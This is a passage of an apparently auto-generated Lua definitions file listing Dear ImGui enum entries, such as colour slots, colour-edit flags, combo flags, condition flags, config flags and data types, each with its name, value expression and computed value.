defs["enums"]["ImGuiCol_"][11] = {}
defs["enums"]["ImGuiCol_"][11]["calc_value"] = 10
defs["enums"]["ImGuiCol_"][11]["name"] = "ImGuiCol_TitleBg"
defs["enums"]["ImGuiCol_"][11]["value"] = "10"
defs["enums"]["ImGuiCol_"][12] = {}
defs["enums"]["ImGuiCol_"][12]["calc_value"] = 11
defs["enums"]["ImGuiCol_"][12]["name"] = "ImGuiCol_TitleBgActive"
defs["enums"]["ImGuiCol_"][12]["value"] = "11"
defs["enums"]["ImGuiCol_"][13] = {}
defs["enums"]["ImGuiCol_"][13]["calc_value"] = 12
defs["enums"]["ImGuiCol_"][13]["name"] = "ImGuiCol_TitleBgCollapsed"
defs["enums"]["ImGuiCol_"][13]["value"] = "12"
defs["enums"]["ImGuiCol_"][14] = {}
defs["enums"]["ImGuiCol_"][14]["calc_value"] = 13
defs["enums"]["ImGuiCol_"][14]["name"] = "ImGuiCol_MenuBarBg"
defs["enums"]["ImGuiCol_"][14]["value"] = "13"
defs["enums"]["ImGuiCol_"][15] = {}
defs["enums"]["ImGuiCol_"][15]["calc_value"] = 14
defs["enums"]["ImGuiCol_"][15]["name"] = "ImGuiCol_ScrollbarBg"
defs["enums"]["ImGuiCol_"][15]["value"] = "14"
defs["enums"]["ImGuiCol_"][16] = {}
defs["enums"]["ImGuiCol_"][16]["calc_value"] = 15
defs["enums"]["ImGuiCol_"][16]["name"] = "ImGuiCol_ScrollbarGrab"
defs["enums"]["ImGuiCol_"][16]["value"] = "15"
defs["enums"]["ImGuiCol_"][17] = {}
defs["enums"]["ImGuiCol_"][17]["calc_value"] = 16
defs["enums"]["ImGuiCol_"][17]["name"] = "ImGuiCol_ScrollbarGrabHovered"
defs["enums"]["ImGuiCol_"][17]["value"] = "16"
defs["enums"]["ImGuiCol_"][18] = {}
defs["enums"]["ImGuiCol_"][18]["calc_value"] = 17
defs["enums"]["ImGuiCol_"][18]["name"] = "ImGuiCol_ScrollbarGrabActive"
defs["enums"]["ImGuiCol_"][18]["value"] = "17"
defs["enums"]["ImGuiCol_"][19] = {}
defs["enums"]["ImGuiCol_"][19]["calc_value"] = 18
defs["enums"]["ImGuiCol_"][19]["name"] = "ImGuiCol_CheckMark"
defs["enums"]["ImGuiCol_"][19]["value"] = "18"
defs["enums"]["ImGuiCol_"][20] = {}
defs["enums"]["ImGuiCol_"][20]["calc_value"] = 19
defs["enums"]["ImGuiCol_"][20]["name"] = "ImGuiCol_SliderGrab"
defs["enums"]["ImGuiCol_"][20]["value"] = "19"
defs["enums"]["ImGuiCol_"][21] = {}
defs["enums"]["ImGuiCol_"][21]["calc_value"] = 20
defs["enums"]["ImGuiCol_"][21]["name"] = "ImGuiCol_SliderGrabActive"
defs["enums"]["ImGuiCol_"][21]["value"] = "20"
defs["enums"]["ImGuiCol_"][22] = {}
defs["enums"]["ImGuiCol_"][22]["calc_value"] = 21
defs["enums"]["ImGuiCol_"][22]["name"] = "ImGuiCol_Button"
defs["enums"]["ImGuiCol_"][22]["value"] = "21"
defs["enums"]["ImGuiCol_"][23] = {}
defs["enums"]["ImGuiCol_"][23]["calc_value"] = 22
defs["enums"]["ImGuiCol_"][23]["name"] = "ImGuiCol_ButtonHovered"
defs["enums"]["ImGuiCol_"][23]["value"] = "22"
defs["enums"]["ImGuiCol_"][24] = {}
defs["enums"]["ImGuiCol_"][24]["calc_value"] = 23
defs["enums"]["ImGuiCol_"][24]["name"] = "ImGuiCol_ButtonActive"
defs["enums"]["ImGuiCol_"][24]["value"] = "23"
defs["enums"]["ImGuiCol_"][25] = {}
defs["enums"]["ImGuiCol_"][25]["calc_value"] = 24
defs["enums"]["ImGuiCol_"][25]["name"] = "ImGuiCol_Header"
defs["enums"]["ImGuiCol_"][25]["value"] = "24"
defs["enums"]["ImGuiCol_"][26] = {}
defs["enums"]["ImGuiCol_"][26]["calc_value"] = 25
defs["enums"]["ImGuiCol_"][26]["name"] = "ImGuiCol_HeaderHovered"
defs["enums"]["ImGuiCol_"][26]["value"] = "25"
defs["enums"]["ImGuiCol_"][27] = {}
defs["enums"]["ImGuiCol_"][27]["calc_value"] = 26
defs["enums"]["ImGuiCol_"][27]["name"] = "ImGuiCol_HeaderActive"
defs["enums"]["ImGuiCol_"][27]["value"] = "26"
defs["enums"]["ImGuiCol_"][28] = {}
defs["enums"]["ImGuiCol_"][28]["calc_value"] = 27
defs["enums"]["ImGuiCol_"][28]["name"] = "ImGuiCol_Separator"
defs["enums"]["ImGuiCol_"][28]["value"] = "27"
defs["enums"]["ImGuiCol_"][29] = {}
defs["enums"]["ImGuiCol_"][29]["calc_value"] = 28
defs["enums"]["ImGuiCol_"][29]["name"] = "ImGuiCol_SeparatorHovered"
defs["enums"]["ImGuiCol_"][29]["value"] = "28"
defs["enums"]["ImGuiCol_"][30] = {}
defs["enums"]["ImGuiCol_"][30]["calc_value"] = 29
defs["enums"]["ImGuiCol_"][30]["name"] = "ImGuiCol_SeparatorActive"
defs["enums"]["ImGuiCol_"][30]["value"] = "29"
defs["enums"]["ImGuiCol_"][31] = {}
defs["enums"]["ImGuiCol_"][31]["calc_value"] = 30
defs["enums"]["ImGuiCol_"][31]["name"] = "ImGuiCol_ResizeGrip"
defs["enums"]["ImGuiCol_"][31]["value"] = "30"
defs["enums"]["ImGuiCol_"][32] = {}
defs["enums"]["ImGuiCol_"][32]["calc_value"] = 31
defs["enums"]["ImGuiCol_"][32]["name"] = "ImGuiCol_ResizeGripHovered"
defs["enums"]["ImGuiCol_"][32]["value"] = "31"
defs["enums"]["ImGuiCol_"][33] = {}
defs["enums"]["ImGuiCol_"][33]["calc_value"] = 32
defs["enums"]["ImGuiCol_"][33]["name"] = "ImGuiCol_ResizeGripActive"
defs["enums"]["ImGuiCol_"][33]["value"] = "32"
defs["enums"]["ImGuiCol_"][34] = {}
defs["enums"]["ImGuiCol_"][34]["calc_value"] = 33
defs["enums"]["ImGuiCol_"][34]["name"] = "ImGuiCol_Tab"
defs["enums"]["ImGuiCol_"][34]["value"] = "33"
defs["enums"]["ImGuiCol_"][35] = {}
defs["enums"]["ImGuiCol_"][35]["calc_value"] = 34
defs["enums"]["ImGuiCol_"][35]["name"] = "ImGuiCol_TabHovered"
defs["enums"]["ImGuiCol_"][35]["value"] = "34"
defs["enums"]["ImGuiCol_"][36] = {}
defs["enums"]["ImGuiCol_"][36]["calc_value"] = 35
defs["enums"]["ImGuiCol_"][36]["name"] = "ImGuiCol_TabActive"
defs["enums"]["ImGuiCol_"][36]["value"] = "35"
defs["enums"]["ImGuiCol_"][37] = {}
defs["enums"]["ImGuiCol_"][37]["calc_value"] = 36
defs["enums"]["ImGuiCol_"][37]["name"] = "ImGuiCol_TabUnfocused"
defs["enums"]["ImGuiCol_"][37]["value"] = "36"
defs["enums"]["ImGuiCol_"][38] = {}
defs["enums"]["ImGuiCol_"][38]["calc_value"] = 37
defs["enums"]["ImGuiCol_"][38]["name"] = "ImGuiCol_TabUnfocusedActive"
defs["enums"]["ImGuiCol_"][38]["value"] = "37"
defs["enums"]["ImGuiCol_"][39] = {}
defs["enums"]["ImGuiCol_"][39]["calc_value"] = 38
defs["enums"]["ImGuiCol_"][39]["name"] = "ImGuiCol_PlotLines"
defs["enums"]["ImGuiCol_"][39]["value"] = "38"
defs["enums"]["ImGuiCol_"][40] = {}
defs["enums"]["ImGuiCol_"][40]["calc_value"] = 39
defs["enums"]["ImGuiCol_"][40]["name"] = "ImGuiCol_PlotLinesHovered"
defs["enums"]["ImGuiCol_"][40]["value"] = "39"
defs["enums"]["ImGuiCol_"][41] = {}
defs["enums"]["ImGuiCol_"][41]["calc_value"] = 40
defs["enums"]["ImGuiCol_"][41]["name"] = "ImGuiCol_PlotHistogram"
defs["enums"]["ImGuiCol_"][41]["value"] = "40"
defs["enums"]["ImGuiCol_"][42] = {}
defs["enums"]["ImGuiCol_"][42]["calc_value"] = 41
defs["enums"]["ImGuiCol_"][42]["name"] = "ImGuiCol_PlotHistogramHovered"
defs["enums"]["ImGuiCol_"][42]["value"] = "41"
defs["enums"]["ImGuiCol_"][43] = {}
defs["enums"]["ImGuiCol_"][43]["calc_value"] = 42
defs["enums"]["ImGuiCol_"][43]["name"] = "ImGuiCol_TableHeaderBg"
defs["enums"]["ImGuiCol_"][43]["value"] = "42"
defs["enums"]["ImGuiCol_"][44] = {}
defs["enums"]["ImGuiCol_"][44]["calc_value"] = 43
defs["enums"]["ImGuiCol_"][44]["name"] = "ImGuiCol_TableBorderStrong"
defs["enums"]["ImGuiCol_"][44]["value"] = "43"
defs["enums"]["ImGuiCol_"][45] = {}
defs["enums"]["ImGuiCol_"][45]["calc_value"] = 44
defs["enums"]["ImGuiCol_"][45]["name"] = "ImGuiCol_TableBorderLight"
defs["enums"]["ImGuiCol_"][45]["value"] = "44"
defs["enums"]["ImGuiCol_"][46] = {}
defs["enums"]["ImGuiCol_"][46]["calc_value"] = 45
defs["enums"]["ImGuiCol_"][46]["name"] = "ImGuiCol_TableRowBg"
defs["enums"]["ImGuiCol_"][46]["value"] = "45"
defs["enums"]["ImGuiCol_"][47] = {}
defs["enums"]["ImGuiCol_"][47]["calc_value"] = 46
defs["enums"]["ImGuiCol_"][47]["name"] = "ImGuiCol_TableRowBgAlt"
defs["enums"]["ImGuiCol_"][47]["value"] = "46"
defs["enums"]["ImGuiCol_"][48] = {}
defs["enums"]["ImGuiCol_"][48]["calc_value"] = 47
defs["enums"]["ImGuiCol_"][48]["name"] = "ImGuiCol_TextSelectedBg"
defs["enums"]["ImGuiCol_"][48]["value"] = "47"
defs["enums"]["ImGuiCol_"][49] = {}
defs["enums"]["ImGuiCol_"][49]["calc_value"] = 48
defs["enums"]["ImGuiCol_"][49]["name"] = "ImGuiCol_DragDropTarget"
defs["enums"]["ImGuiCol_"][49]["value"] = "48"
defs["enums"]["ImGuiCol_"][50] = {}
defs["enums"]["ImGuiCol_"][50]["calc_value"] = 49
defs["enums"]["ImGuiCol_"][50]["name"] = "ImGuiCol_NavHighlight"
defs["enums"]["ImGuiCol_"][50]["value"] = "49"
defs["enums"]["ImGuiCol_"][51] = {}
defs["enums"]["ImGuiCol_"][51]["calc_value"] = 50
defs["enums"]["ImGuiCol_"][51]["name"] = "ImGuiCol_NavWindowingHighlight"
defs["enums"]["ImGuiCol_"][51]["value"] = "50"
defs["enums"]["ImGuiCol_"][52] = {}
defs["enums"]["ImGuiCol_"][52]["calc_value"] = 51
defs["enums"]["ImGuiCol_"][52]["name"] = "ImGuiCol_NavWindowingDimBg"
defs["enums"]["ImGuiCol_"][52]["value"] = "51"
defs["enums"]["ImGuiCol_"][53] = {}
defs["enums"]["ImGuiCol_"][53]["calc_value"] = 52
defs["enums"]["ImGuiCol_"][53]["name"] = "ImGuiCol_ModalWindowDimBg"
defs["enums"]["ImGuiCol_"][53]["value"] = "52"
defs["enums"]["ImGuiCol_"][54] = {}
defs["enums"]["ImGuiCol_"][54]["calc_value"] = 53
defs["enums"]["ImGuiCol_"][54]["name"] = "ImGuiCol_COUNT"
defs["enums"]["ImGuiCol_"][54]["value"] = "53"
defs["enums"]["ImGuiColorEditFlags_"] = {}
defs["enums"]["ImGuiColorEditFlags_"][1] = {}
defs["enums"]["ImGuiColorEditFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiColorEditFlags_"][1]["name"] = "ImGuiColorEditFlags_None"
defs["enums"]["ImGuiColorEditFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiColorEditFlags_"][2] = {}
defs["enums"]["ImGuiColorEditFlags_"][2]["calc_value"] = 2
defs["enums"]["ImGuiColorEditFlags_"][2]["name"] = "ImGuiColorEditFlags_NoAlpha"
defs["enums"]["ImGuiColorEditFlags_"][2]["value"] = "1 << 1"
defs["enums"]["ImGuiColorEditFlags_"][3] = {}
defs["enums"]["ImGuiColorEditFlags_"][3]["calc_value"] = 4
defs["enums"]["ImGuiColorEditFlags_"][3]["name"] = "ImGuiColorEditFlags_NoPicker"
defs["enums"]["ImGuiColorEditFlags_"][3]["value"] = "1 << 2"
defs["enums"]["ImGuiColorEditFlags_"][4] = {}
defs["enums"]["ImGuiColorEditFlags_"][4]["calc_value"] = 8
defs["enums"]["ImGuiColorEditFlags_"][4]["name"] = "ImGuiColorEditFlags_NoOptions"
defs["enums"]["ImGuiColorEditFlags_"][4]["value"] = "1 << 3"
defs["enums"]["ImGuiColorEditFlags_"][5] = {}
defs["enums"]["ImGuiColorEditFlags_"][5]["calc_value"] = 16
defs["enums"]["ImGuiColorEditFlags_"][5]["name"] = "ImGuiColorEditFlags_NoSmallPreview"
defs["enums"]["ImGuiColorEditFlags_"][5]["value"] = "1 << 4"
defs["enums"]["ImGuiColorEditFlags_"][6] = {}
defs["enums"]["ImGuiColorEditFlags_"][6]["calc_value"] = 32
defs["enums"]["ImGuiColorEditFlags_"][6]["name"] = "ImGuiColorEditFlags_NoInputs"
defs["enums"]["ImGuiColorEditFlags_"][6]["value"] = "1 << 5"
defs["enums"]["ImGuiColorEditFlags_"][7] = {}
defs["enums"]["ImGuiColorEditFlags_"][7]["calc_value"] = 64
defs["enums"]["ImGuiColorEditFlags_"][7]["name"] = "ImGuiColorEditFlags_NoTooltip"
defs["enums"]["ImGuiColorEditFlags_"][7]["value"] = "1 << 6"
defs["enums"]["ImGuiColorEditFlags_"][8] = {}
defs["enums"]["ImGuiColorEditFlags_"][8]["calc_value"] = 128
defs["enums"]["ImGuiColorEditFlags_"][8]["name"] = "ImGuiColorEditFlags_NoLabel"
defs["enums"]["ImGuiColorEditFlags_"][8]["value"] = "1 << 7"
defs["enums"]["ImGuiColorEditFlags_"][9] = {}
defs["enums"]["ImGuiColorEditFlags_"][9]["calc_value"] = 256
defs["enums"]["ImGuiColorEditFlags_"][9]["name"] = "ImGuiColorEditFlags_NoSidePreview"
defs["enums"]["ImGuiColorEditFlags_"][9]["value"] = "1 << 8"
defs["enums"]["ImGuiColorEditFlags_"][10] = {}
defs["enums"]["ImGuiColorEditFlags_"][10]["calc_value"] = 512
defs["enums"]["ImGuiColorEditFlags_"][10]["name"] = "ImGuiColorEditFlags_NoDragDrop"
defs["enums"]["ImGuiColorEditFlags_"][10]["value"] = "1 << 9"
defs["enums"]["ImGuiColorEditFlags_"][11] = {}
defs["enums"]["ImGuiColorEditFlags_"][11]["calc_value"] = 1024
defs["enums"]["ImGuiColorEditFlags_"][11]["name"] = "ImGuiColorEditFlags_NoBorder"
defs["enums"]["ImGuiColorEditFlags_"][11]["value"] = "1 << 10"
defs["enums"]["ImGuiColorEditFlags_"][12] = {}
defs["enums"]["ImGuiColorEditFlags_"][12]["calc_value"] = 65536
defs["enums"]["ImGuiColorEditFlags_"][12]["name"] = "ImGuiColorEditFlags_AlphaBar"
defs["enums"]["ImGuiColorEditFlags_"][12]["value"] = "1 << 16"
defs["enums"]["ImGuiColorEditFlags_"][13] = {}
defs["enums"]["ImGuiColorEditFlags_"][13]["calc_value"] = 131072
defs["enums"]["ImGuiColorEditFlags_"][13]["name"] = "ImGuiColorEditFlags_AlphaPreview"
defs["enums"]["ImGuiColorEditFlags_"][13]["value"] = "1 << 17"
defs["enums"]["ImGuiColorEditFlags_"][14] = {}
defs["enums"]["ImGuiColorEditFlags_"][14]["calc_value"] = 262144
defs["enums"]["ImGuiColorEditFlags_"][14]["name"] = "ImGuiColorEditFlags_AlphaPreviewHalf"
defs["enums"]["ImGuiColorEditFlags_"][14]["value"] = "1 << 18"
defs["enums"]["ImGuiColorEditFlags_"][15] = {}
defs["enums"]["ImGuiColorEditFlags_"][15]["calc_value"] = 524288
defs["enums"]["ImGuiColorEditFlags_"][15]["name"] = "ImGuiColorEditFlags_HDR"
defs["enums"]["ImGuiColorEditFlags_"][15]["value"] = "1 << 19"
defs["enums"]["ImGuiColorEditFlags_"][16] = {}
defs["enums"]["ImGuiColorEditFlags_"][16]["calc_value"] = 1048576
defs["enums"]["ImGuiColorEditFlags_"][16]["name"] = "ImGuiColorEditFlags_DisplayRGB"
defs["enums"]["ImGuiColorEditFlags_"][16]["value"] = "1 << 20"
defs["enums"]["ImGuiColorEditFlags_"][17] = {}
defs["enums"]["ImGuiColorEditFlags_"][17]["calc_value"] = 2097152
defs["enums"]["ImGuiColorEditFlags_"][17]["name"] = "ImGuiColorEditFlags_DisplayHSV"
defs["enums"]["ImGuiColorEditFlags_"][17]["value"] = "1 << 21"
defs["enums"]["ImGuiColorEditFlags_"][18] = {}
defs["enums"]["ImGuiColorEditFlags_"][18]["calc_value"] = 4194304
defs["enums"]["ImGuiColorEditFlags_"][18]["name"] = "ImGuiColorEditFlags_DisplayHex"
defs["enums"]["ImGuiColorEditFlags_"][18]["value"] = "1 << 22"
defs["enums"]["ImGuiColorEditFlags_"][19] = {}
defs["enums"]["ImGuiColorEditFlags_"][19]["calc_value"] = 8388608
defs["enums"]["ImGuiColorEditFlags_"][19]["name"] = "ImGuiColorEditFlags_Uint8"
defs["enums"]["ImGuiColorEditFlags_"][19]["value"] = "1 << 23"
defs["enums"]["ImGuiColorEditFlags_"][20] = {}
defs["enums"]["ImGuiColorEditFlags_"][20]["calc_value"] = 16777216
defs["enums"]["ImGuiColorEditFlags_"][20]["name"] = "ImGuiColorEditFlags_Float"
defs["enums"]["ImGuiColorEditFlags_"][20]["value"] = "1 << 24"
defs["enums"]["ImGuiColorEditFlags_"][21] = {}
defs["enums"]["ImGuiColorEditFlags_"][21]["calc_value"] = 33554432
defs["enums"]["ImGuiColorEditFlags_"][21]["name"] = "ImGuiColorEditFlags_PickerHueBar"
defs["enums"]["ImGuiColorEditFlags_"][21]["value"] = "1 << 25"
defs["enums"]["ImGuiColorEditFlags_"][22] = {}
defs["enums"]["ImGuiColorEditFlags_"][22]["calc_value"] = 67108864
defs["enums"]["ImGuiColorEditFlags_"][22]["name"] = "ImGuiColorEditFlags_PickerHueWheel"
defs["enums"]["ImGuiColorEditFlags_"][22]["value"] = "1 << 26"
defs["enums"]["ImGuiColorEditFlags_"][23] = {}
defs["enums"]["ImGuiColorEditFlags_"][23]["calc_value"] = 134217728
defs["enums"]["ImGuiColorEditFlags_"][23]["name"] = "ImGuiColorEditFlags_InputRGB"
defs["enums"]["ImGuiColorEditFlags_"][23]["value"] = "1 << 27"
defs["enums"]["ImGuiColorEditFlags_"][24] = {}
defs["enums"]["ImGuiColorEditFlags_"][24]["calc_value"] = 268435456
defs["enums"]["ImGuiColorEditFlags_"][24]["name"] = "ImGuiColorEditFlags_InputHSV"
defs["enums"]["ImGuiColorEditFlags_"][24]["value"] = "1 << 28"
defs["enums"]["ImGuiColorEditFlags_"][25] = {}
defs["enums"]["ImGuiColorEditFlags_"][25]["calc_value"] = 177209344
defs["enums"]["ImGuiColorEditFlags_"][25]["name"] = "ImGuiColorEditFlags__OptionsDefault"
defs["enums"]["ImGuiColorEditFlags_"][25]["value"] = "ImGuiColorEditFlags_Uint8 | ImGuiColorEditFlags_DisplayRGB | ImGuiColorEditFlags_InputRGB | ImGuiColorEditFlags_PickerHueBar"
defs["enums"]["ImGuiColorEditFlags_"][26] = {}
defs["enums"]["ImGuiColorEditFlags_"][26]["calc_value"] = 7340032
defs["enums"]["ImGuiColorEditFlags_"][26]["name"] = "ImGuiColorEditFlags__DisplayMask"
defs["enums"]["ImGuiColorEditFlags_"][26]["value"] = "ImGuiColorEditFlags_DisplayRGB | ImGuiColorEditFlags_DisplayHSV | ImGuiColorEditFlags_DisplayHex"
defs["enums"]["ImGuiColorEditFlags_"][27] = {}
defs["enums"]["ImGuiColorEditFlags_"][27]["calc_value"] = 25165824
defs["enums"]["ImGuiColorEditFlags_"][27]["name"] = "ImGuiColorEditFlags__DataTypeMask"
defs["enums"]["ImGuiColorEditFlags_"][27]["value"] = "ImGuiColorEditFlags_Uint8 | ImGuiColorEditFlags_Float"
defs["enums"]["ImGuiColorEditFlags_"][28] = {}
defs["enums"]["ImGuiColorEditFlags_"][28]["calc_value"] = 100663296
defs["enums"]["ImGuiColorEditFlags_"][28]["name"] = "ImGuiColorEditFlags__PickerMask"
defs["enums"]["ImGuiColorEditFlags_"][28]["value"] = "ImGuiColorEditFlags_PickerHueWheel | ImGuiColorEditFlags_PickerHueBar"
defs["enums"]["ImGuiColorEditFlags_"][29] = {}
defs["enums"]["ImGuiColorEditFlags_"][29]["calc_value"] = 402653184
defs["enums"]["ImGuiColorEditFlags_"][29]["name"] = "ImGuiColorEditFlags__InputMask"
defs["enums"]["ImGuiColorEditFlags_"][29]["value"] = "ImGuiColorEditFlags_InputRGB | ImGuiColorEditFlags_InputHSV"
defs["enums"]["ImGuiComboFlags_"] = {}
defs["enums"]["ImGuiComboFlags_"][1] = {}
defs["enums"]["ImGuiComboFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiComboFlags_"][1]["name"] = "ImGuiComboFlags_None"
defs["enums"]["ImGuiComboFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiComboFlags_"][2] = {}
defs["enums"]["ImGuiComboFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiComboFlags_"][2]["name"] = "ImGuiComboFlags_PopupAlignLeft"
defs["enums"]["ImGuiComboFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiComboFlags_"][3] = {}
defs["enums"]["ImGuiComboFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiComboFlags_"][3]["name"] = "ImGuiComboFlags_HeightSmall"
defs["enums"]["ImGuiComboFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiComboFlags_"][4] = {}
defs["enums"]["ImGuiComboFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiComboFlags_"][4]["name"] = "ImGuiComboFlags_HeightRegular"
defs["enums"]["ImGuiComboFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiComboFlags_"][5] = {}
defs["enums"]["ImGuiComboFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiComboFlags_"][5]["name"] = "ImGuiComboFlags_HeightLarge"
defs["enums"]["ImGuiComboFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiComboFlags_"][6] = {}
defs["enums"]["ImGuiComboFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiComboFlags_"][6]["name"] = "ImGuiComboFlags_HeightLargest"
defs["enums"]["ImGuiComboFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiComboFlags_"][7] = {}
defs["enums"]["ImGuiComboFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiComboFlags_"][7]["name"] = "ImGuiComboFlags_NoArrowButton"
defs["enums"]["ImGuiComboFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiComboFlags_"][8] = {}
defs["enums"]["ImGuiComboFlags_"][8]["calc_value"] = 64
defs["enums"]["ImGuiComboFlags_"][8]["name"] = "ImGuiComboFlags_NoPreview"
defs["enums"]["ImGuiComboFlags_"][8]["value"] = "1 << 6"
defs["enums"]["ImGuiComboFlags_"][9] = {}
defs["enums"]["ImGuiComboFlags_"][9]["calc_value"] = 30
defs["enums"]["ImGuiComboFlags_"][9]["name"] = "ImGuiComboFlags_HeightMask_"
defs["enums"]["ImGuiComboFlags_"][9]["value"] = "ImGuiComboFlags_HeightSmall | ImGuiComboFlags_HeightRegular | ImGuiComboFlags_HeightLarge | ImGuiComboFlags_HeightLargest"
defs["enums"]["ImGuiCond_"] = {}
defs["enums"]["ImGuiCond_"][1] = {}
defs["enums"]["ImGuiCond_"][1]["calc_value"] = 0
defs["enums"]["ImGuiCond_"][1]["name"] = "ImGuiCond_None"
defs["enums"]["ImGuiCond_"][1]["value"] = "0"
defs["enums"]["ImGuiCond_"][2] = {}
defs["enums"]["ImGuiCond_"][2]["calc_value"] = 1
defs["enums"]["ImGuiCond_"][2]["name"] = "ImGuiCond_Always"
defs["enums"]["ImGuiCond_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiCond_"][3] = {}
defs["enums"]["ImGuiCond_"][3]["calc_value"] = 2
defs["enums"]["ImGuiCond_"][3]["name"] = "ImGuiCond_Once"
defs["enums"]["ImGuiCond_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiCond_"][4] = {}
defs["enums"]["ImGuiCond_"][4]["calc_value"] = 4
defs["enums"]["ImGuiCond_"][4]["name"] = "ImGuiCond_FirstUseEver"
defs["enums"]["ImGuiCond_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiCond_"][5] = {}
defs["enums"]["ImGuiCond_"][5]["calc_value"] = 8
defs["enums"]["ImGuiCond_"][5]["name"] = "ImGuiCond_Appearing"
defs["enums"]["ImGuiCond_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiConfigFlags_"] = {}
defs["enums"]["ImGuiConfigFlags_"][1] = {}
defs["enums"]["ImGuiConfigFlags_"][1]["calc_value"] = 0
defs["enums"]["ImGuiConfigFlags_"][1]["name"] = "ImGuiConfigFlags_None"
defs["enums"]["ImGuiConfigFlags_"][1]["value"] = "0"
defs["enums"]["ImGuiConfigFlags_"][2] = {}
defs["enums"]["ImGuiConfigFlags_"][2]["calc_value"] = 1
defs["enums"]["ImGuiConfigFlags_"][2]["name"] = "ImGuiConfigFlags_NavEnableKeyboard"
defs["enums"]["ImGuiConfigFlags_"][2]["value"] = "1 << 0"
defs["enums"]["ImGuiConfigFlags_"][3] = {}
defs["enums"]["ImGuiConfigFlags_"][3]["calc_value"] = 2
defs["enums"]["ImGuiConfigFlags_"][3]["name"] = "ImGuiConfigFlags_NavEnableGamepad"
defs["enums"]["ImGuiConfigFlags_"][3]["value"] = "1 << 1"
defs["enums"]["ImGuiConfigFlags_"][4] = {}
defs["enums"]["ImGuiConfigFlags_"][4]["calc_value"] = 4
defs["enums"]["ImGuiConfigFlags_"][4]["name"] = "ImGuiConfigFlags_NavEnableSetMousePos"
defs["enums"]["ImGuiConfigFlags_"][4]["value"] = "1 << 2"
defs["enums"]["ImGuiConfigFlags_"][5] = {}
defs["enums"]["ImGuiConfigFlags_"][5]["calc_value"] = 8
defs["enums"]["ImGuiConfigFlags_"][5]["name"] = "ImGuiConfigFlags_NavNoCaptureKeyboard"
defs["enums"]["ImGuiConfigFlags_"][5]["value"] = "1 << 3"
defs["enums"]["ImGuiConfigFlags_"][6] = {}
defs["enums"]["ImGuiConfigFlags_"][6]["calc_value"] = 16
defs["enums"]["ImGuiConfigFlags_"][6]["name"] = "ImGuiConfigFlags_NoMouse"
defs["enums"]["ImGuiConfigFlags_"][6]["value"] = "1 << 4"
defs["enums"]["ImGuiConfigFlags_"][7] = {}
defs["enums"]["ImGuiConfigFlags_"][7]["calc_value"] = 32
defs["enums"]["ImGuiConfigFlags_"][7]["name"] = "ImGuiConfigFlags_NoMouseCursorChange"
defs["enums"]["ImGuiConfigFlags_"][7]["value"] = "1 << 5"
defs["enums"]["ImGuiConfigFlags_"][8] = {}
defs["enums"]["ImGuiConfigFlags_"][8]["calc_value"] = 1048576
defs["enums"]["ImGuiConfigFlags_"][8]["name"] = "ImGuiConfigFlags_IsSRGB"
defs["enums"]["ImGuiConfigFlags_"][8]["value"] = "1 << 20"
defs["enums"]["ImGuiConfigFlags_"][9] = {}
defs["enums"]["ImGuiConfigFlags_"][9]["calc_value"] = 2097152
defs["enums"]["ImGuiConfigFlags_"][9]["name"] = "ImGuiConfigFlags_IsTouchScreen"
defs["enums"]["ImGuiConfigFlags_"][9]["value"] = "1 << 21"
defs["enums"]["ImGuiDataType_"] = {}
defs["enums"]["ImGuiDataType_"][1] = {}
defs["enums"]["ImGuiDataType_"][1]["calc_value"] = 0
defs["enums"]["ImGuiDataType_"][1]["name"] = "ImGuiDataType_S8"
defs["enums"]["ImGuiDataType_"][1]["value"] = "0"
defs["enums"]["ImGuiDataType_"][2] = {}
defs["enums"]["ImGuiDataType_"][2]["calc_value"] = 1
defs["enums"]["ImGuiDataType_"][2]["name"] = "ImGuiDataType_U8"
defs["enums"]["ImGuiDataType_"][2]["value"] = "1"
defs["enums"]["ImGuiDataType_"][3] = {}
defs["enums"]["ImGuiDataType_"][3]["calc_value"] = 2
defs["enums"]["ImGuiDataType_"][3]["name"] = "ImGuiDataType_S16"
defs["enums"]["ImGuiDataType_"][3]["value"] = "2"
defs["enums"]["ImGuiDataType_"][4] = {}
defs["enums"]["ImGuiDataType_"][4]["calc_value"] = 3
defs["enums"]["ImGuiDataType_"][4]["name"] = "ImGuiDataType_U16"
defs["enums"]["ImGuiDataType_"][4]["value"] = "3"
defs["enums"]["ImGuiDataType_"][5] = {}
defs["enums"]["ImGuiDataType_"][5]["calc_value"] = 4
defs["enums"]["ImGuiDataType_"][5]["name"] = "ImGuiDataType_S32"
defs["enums"]["ImGuiDataType_"][5]["value"] = "4"
defs["enums"]["ImGuiDataType_"][6] = {}
defs["enums"]["ImGuiDataType_"][6]["calc_value"] = 5
defs["enums"]["ImGuiDataType_"][6]["name"] = "ImGuiDataType_U32"
defs["enums"]["ImGuiDataType_"][6]["value"] = "5"
defs["enums"]["ImGuiDataType_"][7] = {}
defs["enums"]["ImGuiDataType_"][7]["calc_value"] = 6
defs["enums"]["ImGuiDataType_"][7]["name"] = "ImGuiDataType_S64"
defs["enums"]["ImGuiDataType_"][7]["value"] = "6"
defs["enums"]["ImGuiDataType_"][8] = {}
defs["enums"]["ImGuiDataType_"][8]["calc_value"] = 7
defs["enums"]["ImGuiDataType_"][8]["name"] = "ImGuiDataType_U64"
defs["enums"]["ImGuiDataType_"][8]["value"] = "7"
defs["enums"]["ImGuiDataType_"][9] = {}
defs["enums"]["ImGuiDataType_"][9]["calc_value"] = 8
defs["enums"]["ImGuiDataType_"][9]["name"] = "ImGuiDataType_Float"
defs["enums"]["ImGuiDataType_"][9]["value"] = "8"
defs["enums"]["ImGuiDataType_"][10] = {}
